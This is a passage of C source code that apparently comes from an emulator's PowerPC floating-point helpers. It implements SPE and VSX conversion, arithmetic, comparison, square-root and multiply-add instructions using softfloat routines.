int64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_div(u.f, tmp, &env->vec_status); return u.l; } static inline uint32_t efscfuf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.f = uint32_to_float32(val, &env->vec_status); tmp = uint64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_div(u.f, tmp, &env->vec_status); return u.l; } static inline uint32_t efsctsf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } tmp = uint64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_mul(u.f, tmp, &env->vec_status); return float32_to_int32(u.f, &env->vec_status); } static inline uint32_t efsctuf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } tmp = uint64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_mul(u.f, tmp, &env->vec_status); return float32_to_uint32(u.f, &env->vec_status); } #define HELPER_SPE_SINGLE_CONV(name) \ uint32_t helper_e##name(CPUPPCState *env, uint32_t val) \ { \ return e##name(env, val); \ } /* efscfsi */ HELPER_SPE_SINGLE_CONV(fscfsi); /* efscfui */ HELPER_SPE_SINGLE_CONV(fscfui); /* efscfuf */ HELPER_SPE_SINGLE_CONV(fscfuf); /* efscfsf */ HELPER_SPE_SINGLE_CONV(fscfsf); /* efsctsi */ HELPER_SPE_SINGLE_CONV(fsctsi); /* efsctui */ HELPER_SPE_SINGLE_CONV(fsctui); /* efsctsiz */ HELPER_SPE_SINGLE_CONV(fsctsiz); /* efsctuiz */ HELPER_SPE_SINGLE_CONV(fsctuiz); /* efsctsf */ HELPER_SPE_SINGLE_CONV(fsctsf); /* efsctuf */ HELPER_SPE_SINGLE_CONV(fsctuf); #define HELPER_SPE_VECTOR_CONV(name) \ uint64_t helper_ev##name(CPUPPCState *env, uint64_t val) \ { \ return ((uint64_t)e##name(env, val >> 32) << 32) | \ (uint64_t)e##name(env, val); \ } /* evfscfsi */ HELPER_SPE_VECTOR_CONV(fscfsi); /* evfscfui */ HELPER_SPE_VECTOR_CONV(fscfui); /* evfscfuf */ HELPER_SPE_VECTOR_CONV(fscfuf); /* evfscfsf */ HELPER_SPE_VECTOR_CONV(fscfsf); /* evfsctsi */ HELPER_SPE_VECTOR_CONV(fsctsi); /* evfsctui */ HELPER_SPE_VECTOR_CONV(fsctui); /* evfsctsiz */ HELPER_SPE_VECTOR_CONV(fsctsiz); /* evfsctuiz */ HELPER_SPE_VECTOR_CONV(fsctuiz); /* evfsctsf */ HELPER_SPE_VECTOR_CONV(fsctsf); /* evfsctuf */ HELPER_SPE_VECTOR_CONV(fsctuf); /* Single-precision floating-point arithmetic */ static inline uint32_t efsadd(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_add(u1.f, u2.f, &env->vec_status); return u1.l; } static inline uint32_t efssub(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_sub(u1.f, u2.f, &env->vec_status); return u1.l; } static inline uint32_t efsmul(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_mul(u1.f, u2.f, &env->vec_status); return u1.l; } static inline uint32_t efsdiv(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_div(u1.f, u2.f, &env->vec_status); return u1.l; } #define HELPER_SPE_SINGLE_ARITH(name) \ uint32_t helper_e##name(CPUPPCState *env, uint32_t op1, uint32_t op2) \ { \ return e##name(env, op1, op2); \ } /* efsadd */ HELPER_SPE_SINGLE_ARITH(fsadd); /* efssub */ HELPER_SPE_SINGLE_ARITH(fssub); /* efsmul */ HELPER_SPE_SINGLE_ARITH(fsmul); /* efsdiv */ HELPER_SPE_SINGLE_ARITH(fsdiv); #define HELPER_SPE_VECTOR_ARITH(name) \ uint64_t helper_ev##name(CPUPPCState *env, uint64_t op1, uint64_t op2) \ { \ return ((uint64_t)e##name(env, op1 >> 32, op2 >> 32) << 32) | \ (uint64_t)e##name(env, op1, op2); \ } /* evfsadd */ HELPER_SPE_VECTOR_ARITH(fsadd); /* evfssub */ HELPER_SPE_VECTOR_ARITH(fssub); /* evfsmul */ HELPER_SPE_VECTOR_ARITH(fsmul); /* evfsdiv */ HELPER_SPE_VECTOR_ARITH(fsdiv); /* Single-precision floating-point comparisons */ static inline uint32_t efscmplt(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; return float32_lt(u1.f, u2.f, &env->vec_status) ? 4 : 0; } static inline uint32_t efscmpgt(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; return float32_le(u1.f, u2.f, &env->vec_status) ? 0 : 4; } static inline uint32_t efscmpeq(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; return float32_eq(u1.f, u2.f, &env->vec_status) ? 4 : 0; } static inline uint32_t efststlt(CPUPPCState *env, uint32_t op1, uint32_t op2) { /* XXX: TODO: ignore special values (NaN, infinites, ...) */ return efscmplt(env, op1, op2); } static inline uint32_t efststgt(CPUPPCState *env, uint32_t op1, uint32_t op2) { /* XXX: TODO: ignore special values (NaN, infinites, ...) */ return efscmpgt(env, op1, op2); } static inline uint32_t efststeq(CPUPPCState *env, uint32_t op1, uint32_t op2) { /* XXX: TODO: ignore special values (NaN, infinites, ...) */ return efscmpeq(env, op1, op2); } #define HELPER_SINGLE_SPE_CMP(name) \ uint32_t helper_e##name(CPUPPCState *env, uint32_t op1, uint32_t op2) \ { \ return e##name(env, op1, op2); \ } /* efststlt */ HELPER_SINGLE_SPE_CMP(fststlt); /* efststgt */ HELPER_SINGLE_SPE_CMP(fststgt); /* efststeq */ HELPER_SINGLE_SPE_CMP(fststeq); /* efscmplt */ HELPER_SINGLE_SPE_CMP(fscmplt); /* efscmpgt */ HELPER_SINGLE_SPE_CMP(fscmpgt); /* efscmpeq */ HELPER_SINGLE_SPE_CMP(fscmpeq); static inline uint32_t evcmp_merge(int t0, int t1) { return (t0 << 3) | (t1 << 2) | ((t0 | t1) << 1) | (t0 & t1); } #define HELPER_VECTOR_SPE_CMP(name) \ uint32_t helper_ev##name(CPUPPCState *env, uint64_t op1, uint64_t op2) \ { \ return evcmp_merge(e##name(env, op1 >> 32, op2 >> 32), \ e##name(env, op1, op2)); \ } /* evfststlt */ HELPER_VECTOR_SPE_CMP(fststlt); /* evfststgt */ HELPER_VECTOR_SPE_CMP(fststgt); /* evfststeq */ HELPER_VECTOR_SPE_CMP(fststeq); /* evfscmplt */ HELPER_VECTOR_SPE_CMP(fscmplt); /* evfscmpgt */ HELPER_VECTOR_SPE_CMP(fscmpgt); /* evfscmpeq */ HELPER_VECTOR_SPE_CMP(fscmpeq); /* Double-precision floating-point conversion */ uint64_t helper_efdcfsi(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; u.d = int32_to_float64(val, &env->vec_status); return u.ll; } uint64_t helper_efdcfsid(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.d = int64_to_float64(val, &env->vec_status); return u.ll; } uint64_t helper_efdcfui(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; u.d = uint32_to_float64(val, &env->vec_status); return u.ll; } uint64_t helper_efdcfuid(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.d = uint64_to_float64(val, &env->vec_status); return u.ll; } uint32_t helper_efdctsi(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_int32(u.d, &env->vec_status); } uint32_t helper_efdctui(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_uint32(u.d, &env->vec_status); } uint32_t helper_efdctsiz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_int32_round_to_zero(u.d, &env->vec_status); } uint64_t helper_efdctsidz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_int64_round_to_zero(u.d, &env->vec_status); } uint32_t helper_efdctuiz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_uint32_round_to_zero(u.d, &env->vec_status); } uint64_t helper_efdctuidz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_uint64_round_to_zero(u.d, &env->vec_status); } uint64_t helper_efdcfsf(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; float64 tmp; u.d = int32_to_float64(val, &env->vec_status); tmp = int64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_div(u.d, tmp, &env->vec_status); return u.ll; } uint64_t helper_efdcfuf(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; float64 tmp; u.d = uint32_to_float64(val, &env->vec_status); tmp = int64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_div(u.d, tmp, &env->vec_status); return u.ll; } uint32_t helper_efdctsf(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; float64 tmp; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } tmp = uint64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_mul(u.d, tmp, &env->vec_status); return float64_to_int32(u.d, &env->vec_status); } uint32_t helper_efdctuf(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; float64 tmp; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } tmp = uint64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_mul(u.d, tmp, &env->vec_status); return float64_to_uint32(u.d, &env->vec_status); } uint32_t helper_efscfd(CPUPPCState *env, uint64_t val) { CPU_DoubleU u1; CPU_FloatU u2; u1.ll = val; u2.f = float64_to_float32(u1.d, &env->vec_status); return u2.l; } uint64_t helper_efdcfs(CPUPPCState *env, uint32_t val) { CPU_DoubleU u2; CPU_FloatU u1; u1.l = val; u2.d = float32_to_float64(u1.f, &env->vec_status); return u2.ll; } /* Double precision fixed-point arithmetic */ uint64_t helper_efdadd(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_add(u1.d, u2.d, &env->vec_status); return u1.ll; } uint64_t helper_efdsub(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_sub(u1.d, u2.d, &env->vec_status); return u1.ll; } uint64_t helper_efdmul(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_mul(u1.d, u2.d, &env->vec_status); return u1.ll; } uint64_t helper_efddiv(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_div(u1.d, u2.d, &env->vec_status); return u1.ll; } /* Double precision floating point helpers */ uint32_t helper_efdtstlt(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; return float64_lt(u1.d, u2.d, &env->vec_status) ? 4 : 0; } uint32_t helper_efdtstgt(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; return float64_le(u1.d, u2.d, &env->vec_status) ? 0 : 4; } uint32_t helper_efdtsteq(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; return float64_eq_quiet(u1.d, u2.d, &env->vec_status) ? 4 : 0; } uint32_t helper_efdcmplt(CPUPPCState *env, uint64_t op1, uint64_t op2) { /* XXX: TODO: test special values (NaN, infinites, ...) */ return helper_efdtstlt(env, op1, op2); } uint32_t helper_efdcmpgt(CPUPPCState *env, uint64_t op1, uint64_t op2) { /* XXX: TODO: test special values (NaN, infinites, ...) */ return helper_efdtstgt(env, op1, op2); } uint32_t helper_efdcmpeq(CPUPPCState *env, uint64_t op1, uint64_t op2) { /* XXX: TODO: test special values (NaN, infinites, ...) */ return helper_efdtsteq(env, op1, op2); } #define float64_to_float64(x, env) x /* * VSX_ADD_SUB - VSX floating point add/subract * name - instruction mnemonic * op - operation (add or sub) * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_ADD_SUB(name, op, nels, tp, fld, sfprf, r2sp) \ void helper_##name(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_##op(xa->fld, xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ float_invalid_op_addsub(env, sfprf, GETPC(), \ tp##_classify(xa->fld) | \ tp##_classify(xb->fld)); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_ADD_SUB(xsadddp, add, 1, float64, VsrD(0), 1, 0) VSX_ADD_SUB(xsaddsp, add, 1, float64, VsrD(0), 1, 1) VSX_ADD_SUB(xvadddp, add, 2, float64, VsrD(i), 0, 0) VSX_ADD_SUB(xvaddsp, add, 4, float32, VsrW(i), 0, 0) VSX_ADD_SUB(xssubdp, sub, 1, float64, VsrD(0), 1, 0) VSX_ADD_SUB(xssubsp, sub, 1, float64, VsrD(0), 1, 1) VSX_ADD_SUB(xvsubdp, sub, 2, float64, VsrD(i), 0, 0) VSX_ADD_SUB(xvsubsp, sub, 4, float32, VsrW(i), 0, 0) void helper_xsaddqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_add(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } /* * VSX_MUL - VSX floating point multiply * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_MUL(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_mul(xa->fld, xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ float_invalid_op_mul(env, sfprf, GETPC(), \ tp##_classify(xa->fld) | \ tp##_classify(xb->fld)); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_MUL(xsmuldp, 1, float64, VsrD(0), 1, 0) VSX_MUL(xsmulsp, 1, float64, VsrD(0), 1, 1) VSX_MUL(xvmuldp, 2, float64, VsrD(i), 0, 0) VSX_MUL(xvmulsp, 4, float32, VsrW(i), 0, 0) void helper_xsmulqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_mul(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_mul(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } /* * VSX_DIV - VSX floating point divide * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_DIV(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_div(xa->fld, xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ float_invalid_op_div(env, sfprf, GETPC(), \ tp##_classify(xa->fld) | \ tp##_classify(xb->fld)); \ } \ if (unlikely(tstat.float_exception_flags & float_flag_divbyzero)) { \ float_zero_divide_excp(env, GETPC()); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_DIV(xsdivdp, 1, float64, VsrD(0), 1, 0) VSX_DIV(xsdivsp, 1, float64, VsrD(0), 1, 1) VSX_DIV(xvdivdp, 2, float64, VsrD(i), 0, 0) VSX_DIV(xvdivsp, 4, float32, VsrW(i), 0, 0) void helper_xsdivqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_div(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_div(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } if (unlikely(tstat.float_exception_flags & float_flag_divbyzero)) { float_zero_divide_excp(env, GETPC()); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } /* * VSX_RE - VSX floating point reciprocal estimate * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_RE(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_signaling_nan(xb->fld, &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ t.fld = tp##_div(tp##_one, xb->fld, &env->fp_status); \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_RE(xsredp, 1, float64, VsrD(0), 1, 0) VSX_RE(xsresp, 1, float64, VsrD(0), 1, 1) VSX_RE(xvredp, 2, float64, VsrD(i), 0, 0) VSX_RE(xvresp, 4, float32, VsrW(i), 0, 0) /* * VSX_SQRT - VSX floating point square root * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_SQRT(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_sqrt(xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ if (tp##_is_neg(xb->fld) && !tp##_is_zero(xb->fld)) { \ float_invalid_op_vxsqrt(env, sfprf, GETPC()); \ } else if (tp##_is_signaling_nan(xb->fld, &tstat)) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_SQRT(xssqrtdp, 1, float64, VsrD(0), 1, 0) VSX_SQRT(xssqrtsp, 1, float64, VsrD(0), 1, 1) VSX_SQRT(xvsqrtdp, 2, float64, VsrD(i), 0, 0) VSX_SQRT(xvsqrtsp, 4, float32, VsrW(i), 0, 0) /* *VSX_RSQRTE - VSX floating point reciprocal square root estimate * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_RSQRTE(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_sqrt(xb->fld, &tstat); \ t.fld = tp##_div(tp##_one, t.fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ if (tp##_is_neg(xb->fld) && !tp##_is_zero(xb->fld)) { \ float_invalid_op_vxsqrt(env, sfprf, GETPC()); \ } else if (tp##_is_signaling_nan(xb->fld, &tstat)) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_RSQRTE(xsrsqrtedp, 1, float64, VsrD(0), 1, 0) VSX_RSQRTE(xsrsqrtesp, 1, float64, VsrD(0), 1, 1) VSX_RSQRTE(xvrsqrtedp, 2, float64, VsrD(i), 0, 0) VSX_RSQRTE(xvrsqrtesp, 4, float32, VsrW(i), 0, 0) /* * VSX_TDIV - VSX floating point test for divide * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * emin - minimum unbiased exponent * emax - maximum unbiased exponent * nbits - number of fraction bits */ #define VSX_TDIV(op, nels, tp, fld, emin, emax, nbits) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ int i; \ int fe_flag = 0; \ int fg_flag = 0; \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_infinity(xa->fld) || \ tp##_is_infinity(xb->fld) || \ tp##_is_zero(xb->fld))) { \ fe_flag = 1; \ fg_flag = 1; \ } else { \ int e_a = ppc_##tp##_get_unbiased_exp(xa->fld); \ int e_b = ppc_##tp##_get_unbiased_exp(xb->fld); \ \ if (unlikely(tp##_is_any_nan(xa->fld) || \ tp##_is_any_nan(xb->fld))) { \ fe_flag = 1; \ } else if ((e_b <= emin) || (e_b >= (emax - 2))) { \ fe_flag = 1; \ } else if (!tp##_is_zero(xa->fld) && \ (((e_a - e_b) >= emax) || \ ((e_a - e_b) <= (emin + 1)) || \ (e_a <= (emin + nbits)))) { \ fe_flag = 1; \ } \ \ if (unlikely(tp##_is_zero_or_denormal(xb->fld))) { \ /* \ * XB is not zero because of the above check and so \ * must be denormalized. \ */ \ fg_flag = 1; \ } \ } \ } \ \ env->crf[BF(opcode)] = 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); \ } VSX_TDIV(xstdivdp, 1, float64, VsrD(0), -1022, 1023, 52) VSX_TDIV(xvtdivdp, 2, float64, VsrD(i), -1022, 1023, 52) VSX_TDIV(xvtdivsp, 4, float32, VsrW(i), -126, 127, 23) /* * VSX_TSQRT - VSX floating point test for square root * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * emin - minimum unbiased exponent * emax - maximum unbiased exponent * nbits - number of fraction bits */ #define VSX_TSQRT(op, nels, tp, fld, emin, nbits) \ void helper_##op(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xb) \ { \ int i; \ int fe_flag = 0; \ int fg_flag = 0; \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_infinity(xb->fld) || \ tp##_is_zero(xb->fld))) { \ fe_flag = 1; \ fg_flag = 1; \ } else { \ int e_b = ppc_##tp##_get_unbiased_exp(xb->fld); \ \ if (unlikely(tp##_is_any_nan(xb->fld))) { \ fe_flag = 1; \ } else if (unlikely(tp##_is_zero(xb->fld))) { \ fe_flag = 1; \ } else if (unlikely(tp##_is_neg(xb->fld))) { \ fe_flag = 1; \ } else if (!tp##_is_zero(xb->fld) && \ (e_b <= (emin + nbits))) { \ fe_flag = 1; \ } \ \ if (unlikely(tp##_is_zero_or_denormal(xb->fld))) { \ /* \ * XB is not zero because of the above check and \ * therefore must be denormalized. \ */ \ fg_flag = 1; \ } \ } \ } \ \ env->crf[BF(opcode)] = 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); \ } VSX_TSQRT(xstsqrtdp, 1, float64, VsrD(0), -1022, 52) VSX_TSQRT(xvtsqrtdp, 2, float64, VsrD(i), -1022, 52) VSX_TSQRT(xvtsqrtsp, 4, float32, VsrW(i), -126, 23) /* * VSX_MADD - VSX floating point muliply/add variations * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * maddflgs - flags for the float*muladd routine that control the * various forms (madd, msub, nmadd, nmsub) * sfprf - set FPRF */ #define VSX_MADD(op, nels, tp, fld, maddflgs, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *b, ppc_vsr_t *c) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ if (r2sp && (tstat.float_rounding_mode == float_round_nearest_even)) {\ /* \ * Avoid double rounding errors by rounding the intermediate \ * result to odd. \ */ \ set_float_rounding_mode(float_round_to_zero, &tstat); \ t.fld = tp##_muladd(xa->fld, b->fld, c->fld, \ maddflgs, &tstat); \ t.fld |= (get_float_exception_flags(&tstat) & \ float_flag_inexact) != 0; \ } else { \ t.fld = tp##_muladd(xa->fld, b->fld, c->fld, \ maddflgs, &tstat); \ } \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ tp##_maddsub_update_excp(env, xa->fld, b->fld, \ c->fld, maddflgs, GETPC()); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_MADD(xsmadddp, 1, float64, VsrD(0), MADD_FLGS, 1, 0) VSX_MADD(xsmsubdp, 1, float64, VsrD(0), MSUB_FLGS, 1, 0) VSX_MADD(xsnmadddp, 1, float64, VsrD(0), NMADD_FLGS, 1, 0) VSX_MADD(xsnmsubdp, 1, float64, VsrD(0), NMSUB_FLGS, 1, 0) VSX_MADD(xsmaddsp, 1, float64, VsrD(0), MADD_FLGS, 1, 1) VSX_MADD(xsmsubsp, 1, float64, VsrD(0), MSUB_FLGS, 1, 1) VSX_MADD(xsnmaddsp, 1, 